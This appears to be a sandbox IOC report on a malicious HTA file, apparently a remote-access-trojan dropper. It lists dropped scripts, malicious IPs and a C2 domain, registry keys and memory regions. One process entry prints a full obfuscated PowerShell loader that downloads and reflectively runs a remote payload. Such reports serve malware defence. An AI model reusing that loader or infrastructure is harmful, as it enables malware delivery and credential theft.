IOC Report
earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta

loading gif

Files

File Path
Type
Category
Malicious
earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta
HTML document, ASCII text, with CRLF line terminators
initial sample
malicious
C:\Windows\Temp\nonordinary.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Windows\Temp\unmovably.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\0[1].txt
Unicode text, UTF-8 text, with very long lines (23046), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2we2yiwa.2u1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsf31zgs.iqu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv92F0.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x046d5b64, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
\Device\Null
ASCII text, with CRLF line terminators, with overstriking
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat
malicious
C:\Windows\SysWOW64\wscript.exe
wscript //nologo "C:\Windows\Temp\nonordinary.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\pzydemearwfqxhycxyyxvgk"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\audwwwpufexvznugobtqylfphx"
malicious
C:\Windows\SysWOW64\recover.exe
C:\Windows\SysWOW64\recover.exe /stext "C:\Users\user\AppData\Local\Temp\cwjoxpavbmpaktikxmgsjyayqdsfy"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\timeout.exe
timeout /t 1 /nobreak
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://104.168.7.38/xampp/sv/ENCRYPTION01.jpg
104.168.7.38
malicious
http://172.245.191.88/660/wearereallyniceloverwithgreatthingsonthatkissinggirlonme.txt
172.245.191.88
malicious
qwertyuioplkjhgfdsazxcvbnm.ydns.eu
malicious
http://nuget.org/NuGet.exe
unknown
http://www.imvu.comr
unknown
http://geoplugin.net/json.gp&
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://104.168.7.38
unknown
https://contoso.com/License
unknown
https://www.google.com;
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://172.245.191.88
unknown
https://analytics.paste.ee
unknown
http://www.nirsoft.net
unknown
http://geoplugin.net/json.gpTX
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
https://paste.ee/d/h0hNZ9qO/0H~
unknown
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pscore6lB
unknown
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://paste.ee/d/h0hNZ9qO/99
unknown
https://paste.ee/
unknown
https://analytics.paste.ee;
unknown
https://github.com/koswald/VBScriptB
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://www.nirsoft.net/
unknown
https://github.com/koswald/VBScript
unknown
http://www.imvu.comata
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://paste.ee/d/h0hNZ9qO/0
23.186.113.60
https://secure.gravatar.com
unknown
https://themes.googleusercontent.com
unknown
https://github.com/dahall/taskscheduler
unknown
https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsP
unknown
http://www.ebuddy.com
unknown
There are 37 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
qwertyuioplkjhgfdsazxcvbnm.ydns.eu
185.208.156.45
malicious
paste.ee
23.186.113.60
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
104.168.7.38
unknown
United States
malicious
172.245.191.88
unknown
United States
malicious
185.208.156.45
qwertyuioplkjhgfdsazxcvbnm.ydns.eu
Switzerland
malicious
23.186.113.60
paste.ee
Reserved
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN
time
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN
UID
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 9 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
E18000
heap
page read and write
malicious
5A28000
trusted library allocation
page read and write
malicious
5671000
trusted library allocation
page read and write
malicious
37E0000
unclassified section
page execute and read and write
malicious
400000
system
page execute and read and write
malicious
3640000
heap
page read and write
5231000
heap
page read and write
35F8000
heap
page read and write
5231000
heap
page read and write
3698000
heap
page read and write
3176000
heap
page read and write
6CF8000
heap
page read and write
6F40000
trusted library allocation
page read and write
4A91000
trusted library allocation
page read and write
7C30000
trusted library allocation
page execute and read and write
4C4D000
heap
page read and write
5231000
heap
page read and write
63E000
stack
page read and write
2C94000
heap
page read and write
3C50000
heap
page read and write
3695000
heap
page read and write
2C94000
heap
page read and write
604C000
heap
page read and write
31F8000
heap
page read and write
553B000
stack
page read and write
4C61000
heap
page read and write
F7A000
stack
page read and write
7F0000
heap
page read and write
4C45000
heap
page read and write
4C49000
heap
page read and write
4D30000
trusted library allocation
page read and write
55D8000
heap
page read and write
4C79000
heap
page read and write
4C97000
heap
page read and write
4C84000
heap
page read and write
7FB000
stack
page read and write
4C49000
heap
page read and write
6575000
trusted library allocation
page read and write
4C65000
heap
page read and write
33B4000
heap
page read and write
6730000
heap
page execute and read and write
4C6C000
heap
page read and write
B8D000
stack
page read and write
BEF000
stack
page read and write
BF4000
stack
page read and write
31CF000
heap
page read and write
31EC000
heap
page read and write
2FC5000
heap
page read and write
33B4000
heap
page read and write
6B0D000
stack
page read and write
7B60000
trusted library allocation
page read and write
840000
trusted library allocation
page read and write
4C64000
heap
page read and write
35B0000
trusted library allocation
page read and write
4C40000
heap
page read and write
2C94000
heap
page read and write
2C94000
heap
page read and write
31CF000
heap
page read and write
31BC000
heap
page read and write
605E000
heap
page read and write
4C50000
heap
page read and write
31EF000
heap
page read and write
4C61000
heap
page read and write
4C49000
heap
page read and write
33B4000
heap
page read and write
3970000
heap
page read and write
5CDC000
stack
page read and write
C40000
heap
page read and write
4C65000
heap
page read and write
31B0000
heap
page read and write
60A0000
heap
page read and write
317A000
heap
page read and write
B29000
stack
page read and write
33B4000
heap
page read and write
4C5E000
heap
page read and write
3161000
heap
page read and write
3151000
heap
page read and write
4C41000
heap
page read and write
9DC000
stack
page read and write
4C61000
heap
page read and write
4C69000
heap
page read and write
E55000
heap
page read and write
312B000
heap
page read and write
3020000
heap
page read and write
31E6000
heap
page read and write
6855000
heap
page read and write
3181000
heap
page read and write
4C61000
heap
page read and write
31D3000
heap
page read and write
4C61000
heap
page read and write
4C61000
heap
page read and write
2C94000
heap
page read and write
3683000
heap
page read and write
33B4000
heap
page read and write
52A0000
heap
page read and write
4C5E000
heap
page read and write
4C61000
heap
page read and write
316D000
heap
page read and write
2BD0000
heap
page read and write
3854000
unclassified section
page execute and read and write
4C41000
heap
page read and write
61E8000
heap
page read and write
33B4000
heap
page read and write
5300000
heap
page read and write
3000000
heap
page read and write
6C4E000
stack
page read and write
4C61000
heap
page read and write
4C41000
heap
page read and write
3176000
heap
page read and write
4C61000
heap
page read and write
4C61000
heap
page read and write
4C40000
heap
page read and write
4C4F000
heap
page read and write
4E0000
heap
page read and write
3BEC000
unclassified section
page execute and read and write
4914000
trusted library allocation
page read and write
319C000
heap
page read and write
4C41000
heap
page read and write
6AA0000
heap
page read and write
3027000
heap
page read and write
5231000
heap
page read and write
36AD000
heap
page read and write
75C0000
heap
page read and write
368F000
stack
page read and write
369F000
heap
page read and write
4C41000
heap
page read and write
33B4000
heap
page read and write
90D0000
trusted library section
page read and write
B40000
heap
page readonly
340E000
stack
page read and write
368E000
heap
page read and write
4C41000
heap
page read and write
30A4000
heap
page read and write
690E000
stack
page read and write
4C4C000
heap
page read and write
2C94000
heap
page read and write
3138000
heap
page read and write
366E000
heap
page read and write
3138000
heap
page read and write
4C5E000
heap
page read and write
605B000
heap
page read and write
2C95000
heap
page read and write
685E000
heap
page read and write
4C5E000
heap
page read and write
5F90000
remote allocation
page read and write
4CA8000
heap
page read and write
2ECC000
stack
page read and write
3640000
heap
page read and write
6C0E000
stack
page read and write
53E0000
heap
page read and write
4C61000
heap
page read and write
36BF000
heap
page read and write
6009000
heap
page read and write
561F000
heap
page read and write
920000
trusted library allocation
page read and write
90B0000
trusted library allocation
page read and write
677F000
stack
page read and write
6840000
heap
page read and write
E95000
heap
page read and write
55D7000
heap
page read and write
31E6000
heap
page read and write
3C1B000
unclassified section
page execute and read and write
2C94000
heap
page read and write
4D4E000
stack
page read and write
E86000
heap
page read and write
43C000
stack
page read and write
30FE000
stack
page read and write
4C61000
heap
page read and write
36A1000
heap
page read and write
61BD000
heap
page read and write
935000
trusted library allocation
page read and write
337E000
stack
page read and write
30A6000
heap
page read and write
3127000
heap
page read and write
31F8000
heap
page read and write
4A83000
trusted library allocation
page read and write
33B4000
heap
page read and write
561E000
heap
page read and write
5F5F000
stack
page read and write
4C5E000
heap
page read and write
36CA000
heap
page read and write
4B7000
heap
page read and write
364B000
heap
page read and write
2FC0000
heap
page read and write
41B000
system
page execute and read and write
70A0000
trusted library allocation
page read and write
400000
system
page execute and read and write
521E000
stack
page read and write
3190000
heap
page read and write
6AE000
heap
page read and write
33B4000
heap
page read and write
31CB000
heap
page read and write
2D0D000
stack
page read and write
3181000
heap
page read and write
C8E000
stack
page read and write
5590000
heap
page read and write
3686000
heap
page read and write
5231000
heap
page read and write
3177000
heap
page read and write
5231000
heap
page read and write
2FF0000
heap
page read and write
5231000
heap
page read and write
317D000
heap
page read and write
854000
trusted library allocation
page read and write
BCE000
stack
page read and write
5EC0000
heap
page read and write
7C10000
heap
page read and write
31CB000
heap
page read and write
499D000
trusted library allocation
page read and write
4C61000
heap
page read and write
2FF0000
heap
page read and write
542F000
stack
page read and write
31BC000
heap
page read and write
2C70000
heap
page read and write
400000
system
page execute and read and write
604C000
heap
page read and write
4C5E000
heap
page read and write
690000
heap
page read and write
61FC000
heap
page read and write
5601000
trusted library allocation
page read and write
5EE0000
heap
page read and write
552F000
stack
page read and write
36A3000
heap
page read and write
2C94000
heap
page read and write
360E000
heap
page read and write
E10000
heap
page read and write
4C61000
heap
page read and write
514F000
heap
page read and write
3110000
heap
page read and write
4C41000
heap
page read and write
36FD000
heap
page read and write
2C94000
heap
page read and write
4C41000
heap
page read and write
6008000
heap
page read and write
51BE000
stack
page read and write
366E000
heap
page read and write
5D1E000
stack
page read and write
5231000
heap
page read and write
5580000
heap
page read and write
850000
trusted library allocation
page read and write
6248000
heap
page read and write
31CF000
heap
page read and write
31B3000
heap
page read and write
70E0000
trusted library allocation
page read and write
31EC000
heap
page read and write
36FD000
heap
page read and write
2EEC000
stack
page read and write
61F3000
heap
page read and write
90C0000
trusted library allocation
page read and write
3445000
heap
page read and write
5E5D000
stack
page read and write
3C00000
unclassified section
page execute and read and write
56BE000
stack
page read and write
2C80000
heap
page readonly
D5C000
stack
page read and write
4C20000
heap
page read and write
4C61000
heap
page read and write
6FAE000
stack
page read and write
36BF000
heap
page read and write
E9F000
heap
page read and write
54EF000
stack
page read and write
5C3E000
stack
page read and write
2A0E000
stack
page read and write
4DCF000
stack
page read and write
2C94000
heap
page read and write
66BE000
stack
page read and write
698E000
stack
page read and write
31EC000
heap
page read and write
4C5A000
heap
page read and write
3129000
heap
page read and write
4C61000
heap
page read and write
2FE0000
heap
page read and write
6AA1000
heap
page read and write
56C4000
heap
page read and write
90B9000
trusted library allocation
page read and write
5231000
heap
page read and write
3680000
heap
page read and write
4C5E000
heap
page read and write
BD0000
heap
page read and write
365F000
heap
page read and write
31E6000
heap
page read and write
6A8F000
stack
page read and write
358E000
stack
page read and write
6F7C000
stack
page read and write
2FEE000
stack
page read and write
31EC000
heap
page read and write
94B000
heap
page read and write
529F000
stack
page read and write
69D0000
heap
page read and write
4C7E000
heap
page read and write
36BF000
heap
page read and write
326F000
stack
page read and write
326F000
heap
page read and write
61C0000
heap
page read and write
4601000
trusted library allocation
page read and write
61A2000
heap
page read and write
358F000
stack
page read and write
7160000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
5231000
heap
page read and write
4C40000
heap
page read and write
2C94000
heap
page read and write
3176000
heap
page read and write
8C0000
trusted library allocation
page execute and read and write
3171000
heap
page read and write
5591000
heap
page read and write
4C50000
heap
page read and write
931000
trusted library allocation
page read and write
6BE000
heap
page read and write
4C5E000
heap
page read and write
3138000
heap
page read and write
3186000
heap
page read and write
D1E000
stack
page read and write
5640000
heap
page read and write
340B000
heap
page read and write
6F50000
trusted library allocation
page read and write
35F0000
heap
page read and write
52C0000
heap
page read and write
6F3E000
stack
page read and write
31EF000
heap
page read and write
49C7000
trusted library allocation
page read and write
4CA8000
heap
page read and write
4C57000
heap
page read and write
4C61000
heap
page read and write
4EA8000
heap
page read and write
369F000
heap
page read and write
31F8000
heap
page read and write
2C95000
heap
page read and write
6006000
heap
page read and write
4C5E000
heap
page read and write
6859000
heap
page read and write
3BE6000
unclassified section
page execute and read and write
45E000
system
page execute and read and write
3181000
heap
page read and write
4C5E000
heap
page read and write
4C61000
heap
page read and write
3199000
heap
page read and write
2A90000
heap
page read and write
3400000
heap
page read and write
4C41000
heap
page read and write
5BDE000
stack
page read and write
4C5E000
heap
page read and write
5231000
heap
page read and write
364B000
heap
page read and write
4C6E000
heap
page read and write
9242000
heap
page read and write
85D000
trusted library allocation
page execute and read and write
4DF0000
heap
page read and write
E65000
heap
page read and write
2C94000
heap
page read and write
4C5E000
heap
page read and write
6BE0000
heap
page read and write
3153000
heap
page read and write
BDC000
stack
page read and write
7C7F000
stack
page read and write
36BF000
heap
page read and write
4C7E000
heap
page read and write
346E000
stack
page read and write
667E000
stack
page read and write
4C40000
heap
page read and write
4C41000
heap
page read and write
CB6000
heap
page read and write
5231000
heap
page read and write
31D2000
heap
page read and write
478000
remote allocation
page execute and read and write
5090000
heap
page read and write
369D000
heap
page read and write
3622000
heap
page read and write
2C90000
heap
page read and write
561F000
heap
page read and write
61B8000
heap
page read and write
4C80000
heap
page read and write
33B4000
heap
page read and write
604E000
heap
page read and write
4CFE000
stack
page read and write
2C95000
heap
page read and write
61A0000
heap
page read and write
DFE000
stack
page read and write
2F90000
heap
page read and write
33B4000
heap
page read and write
6DD0000
trusted library allocation
page read and write
DA0000
trusted library allocation
page read and write
4911000
trusted library allocation
page read and write
326E000
heap
page read and write
7E7E000
stack
page read and write
4C61000
heap
page read and write
880000
trusted library allocation
page read and write
5580000
trusted library allocation
page read and write
6CDD000
heap
page read and write
31A2000
heap
page read and write
4C69000
heap
page read and write
C90000
heap
page read and write
688E000
stack
page read and write
5231000
heap
page read and write
BD7000
stack
page read and write
364F000
heap
page read and write
4880000
trusted library allocation
page read and write
61F0000
heap
page read and write
706D000
stack
page read and write
61FC000
heap
page read and write
4C69000
heap
page read and write
5F90000
heap
page read and write
36CA000
heap
page read and write
10001000
direct allocation
page execute and read and write
5231000
heap
page read and write
5231000
heap
page read and write
4C7D000
heap
page read and write
8EF0000
trusted library section
page read and write
5F70000
trusted library allocation
page read and write
36CA000
heap
page read and write
3248000
heap
page read and write
684B000
stack
page read and write
3182000
heap
page read and write
5F90000
remote allocation
page read and write
36AD000
heap
page read and write
2C94000
heap
page read and write
54F0000
heap
page read and write
5FD9000
heap
page read and write
92C000
trusted library allocation
page read and write
36CA000
heap
page read and write
3161000
heap
page read and write
E00000
heap
page execute and read and write
366E000
heap
page read and write
5640000
heap
page read and write
3636000
heap
page read and write
3151000
heap
page read and write
31EF000
heap
page read and write
31F8000
heap
page read and write
CB0000
heap
page read and write
61C9000
heap
page read and write
31CF000
heap
page read and write
5590000
heap
page read and write
30CE000
stack
page read and write
4C5E000
heap
page read and write
4C61000
heap
page read and write
3138000
heap
page read and write
5370000
heap
page read and write
2FBF000
stack
page read and write
2B9F000
stack
page read and write
694A000
stack
page read and write
4C61000
heap
page read and write
7BCD000
stack
page read and write
4C55000
heap
page read and write
5580000
trusted library allocation
page read and write
7C0F000
stack
page read and write
3191000
heap
page read and write
322E000
stack
page read and write
4C61000
heap
page read and write
6855000
heap
page read and write
397A000
heap
page read and write
4C61000
heap
page read and write
5B3B000
stack
page read and write
29B0000
heap
page read and write
53E1000
heap
page read and write
59BF000
stack
page read and write
4964000
trusted library allocation
page read and write
61E3000
heap
page read and write
4C59000
heap
page read and write
3182000
heap
page read and write
5609000
trusted library allocation
page read and write
3900000
heap
page read and write
61A2000
heap
page read and write
37F4000
heap
page read and write
4C41000
heap
page read and write
7100000
trusted library allocation
page read and write
3640000
heap
page read and write
4C63000
heap
page read and write
517E000
stack
page read and write
6026000
heap
page read and write
817000
heap
page read and write
5231000
heap
page read and write
2F4E000
stack
page read and write
5231000
heap
page read and write
475000
remote allocation
page execute and read and write
31E6000
heap
page read and write
56C0000
heap
page read and write
2C94000
heap
page read and write
2DEE000
stack
page read and write
4C6E000
heap
page read and write
561F000
heap
page read and write
4C40000
heap
page read and write
6B8E000
stack
page read and write
2FA0000
heap
page readonly
37F6000
heap
page read and write
36BF000
heap
page read and write
4C65000
heap
page read and write
4C63000
heap
page read and write
45C000
system
page execute and read and write
6FEE000
stack
page read and write
319F000
heap
page read and write
465C000
trusted library allocation
page read and write
702E000
stack
page read and write
2F0E000
stack
page read and write
E9D000
heap
page read and write
2C95000
heap
page read and write
2C95000
heap
page read and write
61F3000
heap
page read and write
4C84000
heap
page read and write
3151000
heap
page read and write
31EC000
heap
page read and write
6D30000
heap
page read and write
2C95000
heap
page read and write
3684000
heap
page read and write
61F3000
heap
page read and write
3977000
heap
page read and write
4C65000
heap
page read and write
3440000
heap
page read and write
5FE000
stack
page read and write
319C000
heap
page read and write
33B4000
heap
page read and write
326E000
heap
page read and write
36A1000
heap
page read and write
4C5D000
heap
page read and write
4CA8000
heap
page read and write
4A89000
trusted library allocation
page read and write
2F2A000
stack
page read and write
365F000
heap
page read and write
36F3000
heap
page read and write
4C41000
heap
page read and write
31D2000
heap
page read and write
6B4B000
stack
page read and write
364B000
heap
page read and write
49B3000
trusted library allocation
page read and write
4C5E000
heap
page read and write
3687000
heap
page read and write
3198000
heap
page read and write
317E000
heap
page read and write
E7A000
heap
page read and write
4D8E000
stack
page read and write
2C94000
heap
page read and write
7FDD0000
trusted library allocation
page execute and read and write
31CB000
heap
page read and write
5EBE000
stack
page read and write
5B75000
trusted library allocation
page read and write
604C000
heap
page read and write
2C94000
heap
page read and write
4C61000
heap
page read and write
4C63000
heap
page read and write
9200000
heap
page read and write
365F000
heap
page read and write
332E000
stack
page read and write
474000
system
page execute and read and write
70C0000
trusted library allocation
page read and write
4C63000
heap
page read and write
3129000
heap
page read and write
4D30000
heap
page read and write
364F000
heap
page read and write
7DFD000
stack
page read and write
53E3000
heap
page read and write
3622000
heap
page read and write
317F000
heap
page read and write
4C65000
heap
page read and write
70B0000
trusted library allocation
page read and write
4C59000
heap
page read and write
36F0000
heap
page read and write
7400000
trusted library allocation
page read and write
7C20000
heap
page read and write
47D000
stack
page read and write
2C94000
heap
page read and write
4C5E000
heap
page read and write
33B4000
heap
page read and write
2F30000
heap
page read and write
4C57000
heap
page read and write
3118000
heap
page read and write
D9E000
stack
page read and write
30A2000
heap
page read and write
49AA000
trusted library allocation
page read and write
6F60000
trusted library allocation
page read and write
3194000
heap
page read and write
4C4D000
heap
page read and write
4758000
trusted library allocation
page read and write
31EC000
heap
page read and write
36CA000
heap
page read and write
4C61000
heap
page read and write
3681000
heap
page read and write
3181000
heap
page read and write
6AD3000
heap
page read and write
810000
heap
page read and write
2F0E000
stack
page read and write
7AE000
stack
page read and write
5231000
heap
page read and write
4C50000
heap
page read and write
885000
trusted library allocation
page execute and read and write
367D000
heap
page read and write
8B0000
heap
page readonly
495C000
trusted library allocation
page read and write
5FDA000
heap
page read and write
31EF000
heap
page read and write
698E000
stack
page read and write
31EF000
heap
page read and write
4C61000
heap
page read and write
31CB000
heap
page read and write
36CA000
heap
page read and write
4C41000
heap
page read and write
E0D000
stack
page read and write
7404000
trusted library allocation
page read and write
6CFB000
heap
page read and write
3161000
heap
page read and write
368A000
heap
page read and write
312A000
